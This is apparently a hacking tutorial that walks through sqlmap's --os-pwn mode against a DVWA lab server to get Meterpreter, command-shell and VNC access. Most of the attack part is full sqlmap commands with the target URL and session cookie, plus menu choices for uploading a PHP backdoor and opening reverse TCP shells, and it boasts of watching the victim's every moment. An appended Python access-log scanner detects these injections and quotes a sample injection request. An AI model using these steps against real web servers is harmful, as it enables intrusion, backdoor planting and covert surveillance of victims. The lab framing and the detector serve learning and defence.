
Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn)


This article is about how to use sqlmap for SQL injection to hack a victim PC and gain shell access. Here I performed the SQL attack to gain three different types of shell (Meterpreter, command shell, VNC).

Requirements:

Xampp/Wamp Server

DVWA Lab

Kali Linux: Burp Suite, sqlmap

First, install the DVWA lab on your XAMPP or WAMP server (the installation is covered in a separate article).

Now open DVWA on your PC and log in with the following credentials:

Username: admin

Password: password

Click on DVWA Security and set the website security level to low.

From the list of vulnerabilities, select SQL Injection for your attack. Type 1 as the user ID in the text box. Don't click the Submit button before setting the browser proxy; Burp Suite needs the browser proxy configured to work properly.



Turn on Burp Suite, click on Proxy in the menu bar and turn on the "intercept is on" button. Go back to DVWA and click the Submit button. Burp Suite will show the "Cookie" and "Referer" headers in the intercepted request; these will be used later in the sqlmap commands.



Let's enumerate all database names by passing the Referer URL and the cookie to sqlmap.

sqlmap -u "http://192.168.1.79:81/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47" --dbs



It has dumped the names of all databases. Now I am going to choose dvwa to access its back-end database management system.



Now type the following command to access a shell on the web server, and follow the screenshot.

sqlmap -u "http://192.168.1.79:81/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47" -D dvwa --os-pwn



Type 1 to use the Metasploit Framework to establish a reverse connection, then type 4 to select a PHP payload for the supporting server, and type 1 again to use the common locations for a writable directory, into which the payload is uploaded as a backdoor on the victim PC.



Here type 1 for a reverse TCP connection, the default option. I will now choose all three payloads one by one and try to hack the web server each time. Type 1 for Meterpreter.



It will load the Metasploit Framework and provide Meterpreter session 1.



Repeat the whole process up to the reverse TCP connection; when it asks you to choose a payload, type 2 for shell.



Again it will load the Metasploit Framework and provide command shell session 1.



Repeat the whole process up to the reverse TCP connection; when it asks you to choose a payload, this time type 3 for VNC.



Again it will load the Metasploit Framework and launch the VNC viewer.



Here you can see from the given screenshot that I have accessed the victim PC through TightVNC, and now the victim's every moment will be kept under my observation. Hence we have hacked the victim PC three times with different types of shell.
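The requests sent during the steps above all pass through the web server's access log, so the defender's side can be shown as an added example (not part of the original article): a Python check that flags requests to the DVWA SQL injection page whose id parameter is not a plain integer. The log lines, IP addresses, function names and the INTO OUTFILE placeholder request are constructed for illustration, and it is an assumption here that the file-upload step shows up as a MySQL file-write clause in the query string.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format log lines (not from the article).
SAMPLE_LOG = """\
192.168.1.50 - - [10/Jan/2017:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4523 "-" "Mozilla/5.0"
192.168.1.60 - - [10/Jan/2017:10:02:11 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20-&Submit=Submit HTTP/1.1" 200 4610 "-" "sqlmap/1.0 (http://sqlmap.org)"
192.168.1.60 - - [10/Jan/2017:10:03:40 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20INTO%20OUTFILE%20%27PLACEHOLDER%27--%20-&Submit=Submit HTTP/1.1" 200 4400 "-" "Mozilla/5.0"
"""

# Client IP, request target and User-Agent from one combined-format line
LINE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')
# MySQL file-write clauses; assumed here to be how a payload file reaches disk
FILE_WRITE = re.compile(r"\binto\s+(?:outfile|dumpfile)\b", re.I)


def findings(line):
    """Return (client_ip, reasons) for a suspicious request, else None."""
    m = LINE.match(line)
    if not m:
        return None
    ip, target, agent = m.groups()
    url = urlsplit(target)
    if not url.path.rstrip("/").endswith("/vulnerabilities/sqli"):
        return None
    reasons = []
    # parse_qs percent-decodes, so encoded quotes and spaces are seen in clear
    for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
        if not re.fullmatch(r"[0-9]+", value):
            reasons.append("non-numeric id")
        if FILE_WRITE.search(value):
            reasons.append("file write via SQL")
    # Weak signal: sqlmap's default User-Agent is trivially changed
    if agent.lower().startswith("sqlmap/"):
        reasons.append("sqlmap user-agent")
    return (ip, reasons) if reasons else None


def scan(log_text):
    """Scan a whole access log and return the flagged requests in order."""
    return [hit for hit in map(findings, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, ", ".join(reasons))
```

The non-numeric id check is the reliable signal, because the legitimate form only ever submits an integer user ID; the same property is what a parameterized query or integer cast in the application would enforce.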



Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

